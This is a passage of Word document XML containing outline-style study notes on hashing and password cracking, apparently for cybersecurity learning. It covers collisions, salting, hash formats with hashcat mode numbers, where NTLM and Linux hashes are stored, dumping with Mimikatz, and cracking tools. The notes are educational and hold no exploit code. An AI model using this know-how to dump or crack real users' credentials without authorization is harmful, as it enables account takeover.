          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Common in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CyberSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4835B647" w14:textId="1FDD51F6" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hash Collision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089E0351" w14:textId="578F3F75" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two different inputs give same output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D825CF2" w14:textId="56F5BE1A" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unavoidable but can be minimized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AC74F" w14:textId="77BB5FB9" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MD5 and SHA1 have had engineered collisions separately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365D755" w14:textId="3E5E1E05" w:rsidR="001A40D1" w:rsidRPr="0084205E" w:rsidRDefault="001A40D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>But not together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB282E1" w14:textId="53A70341" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uses for Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4934A5D6" w14:textId="241B672F" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verifying data integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A523F0E" w14:textId="13270A78" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verifying passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC94C46" w14:textId="31581C2C" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Plaintext storage or storage via weak encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D9EE0" w14:textId="3390DA43" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashes provides an answer, as no key is required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57121581" w14:textId="77C8E7F3" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rainbow tables, hash-to-plaintext lookups, exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71775EB1" w14:textId="7266C590" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Weak passwords will lead to weak hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB607D7" w14:textId="7A17FF44" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05A8D017" w14:textId="2B7AE396" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Protecting against rainbow tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2479CE1B" w14:textId="0D1C7CEF" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Add Salt to passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F188E3" w14:textId="2925E2F9" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Randomly generated and stored in a DB, unique to each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7602F8" w14:textId="61F35CEE" w:rsidR="006A2BF6" w:rsidRPr="0084205E" w:rsidRDefault="006A2BF6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Added either at start or end to hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504113E4" w14:textId="231AFD29" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and sha512crypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6EC21E" w14:textId="75B8C096" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Recognizing Password Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1396C" w14:textId="36898EDC" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Automated tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A70E7" w14:textId="431630F3" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reliable with hashes that have a prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560B6AA" w14:textId="19DCB0A7" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="003035A8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00F4701F" w:rsidRPr="0084205E">
        <w:t>ashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BA81813" w14:textId="6553C871" w:rsidR="003035A8" w:rsidRPr="0084205E" w:rsidRDefault="003035A8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DDBEB1B" w14:textId="18CBF76B" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unix format $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>format$rounds$salt$hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63DF813C" w14:textId="33F080B1" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="00F4701F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$1$ - md5crypt, Cisco, older Linux/Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85DB59" w14:textId="7E0200F1" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="00F4701F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">$2; 2a; 2b; 2x; 2y$ - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – web applications</w:t>
      </w:r>
      <w:r w:rsidR="001C0BCA" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – 3200 in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C0BCA" w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="773686D2" w14:textId="33A9D51D" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="00F4701F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$6$ - sha512crypt – default for Unix/Linux</w:t>
      </w:r>
      <w:r w:rsidR="001C0BCA" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – 1800 in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C0BCA" w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F00FE" w:rsidRPr="0084205E">
        <w:t>, include ending periods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED342D9" w14:textId="313732D3" w:rsidR="003F00FE" w:rsidRPr="0084205E" w:rsidRDefault="003F00FE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Salted hashes must use &lt;salt&gt;:&lt;password&gt; or &lt;password&gt;:&lt;salt&gt; format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203DA38" w14:textId="2499E06B" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows uses NTLM, variant of md4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E433F7D" w14:textId="23A4187A" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="00F4701F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>32 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910C765" w14:textId="6C05A660" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Identical to Md5 so need context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCCA850" w14:textId="7C058AE7" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Stored in </w:t>
      </w:r>
      <w:r w:rsidR="003035A8" w:rsidRPr="0084205E">
        <w:t>/config/</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE5853" w14:textId="72F414B9" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="00F4701F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NT hashes and LM hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D70EB" w14:textId="0B387E75" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> can help dump them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C6FAA" w14:textId="40584E17" w:rsidR="00C73DAA" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Linux – stored in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379E2A6" w14:textId="2FFC3159" w:rsidR="00377CF8" w:rsidRPr="0084205E" w:rsidRDefault="00C73DAA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Root readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDE903" w14:textId="367D3DC6" w:rsidR="00F4701F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB79B82" w14:textId="3AB26176" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> decrypt hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851CA93" w14:textId="7F2092C5" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> crack them via hashing a large number of inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB8668" w14:textId="4EF39E6F" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311D51F" w14:textId="0108F8E8" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GPUs are effective in hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50418BDC" w14:textId="72818D3A" w:rsidR="00036B4F" w:rsidRPr="0084205E" w:rsidRDefault="00036B4F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>VM Cracking</w:t>
      </w:r>
    </w:p>
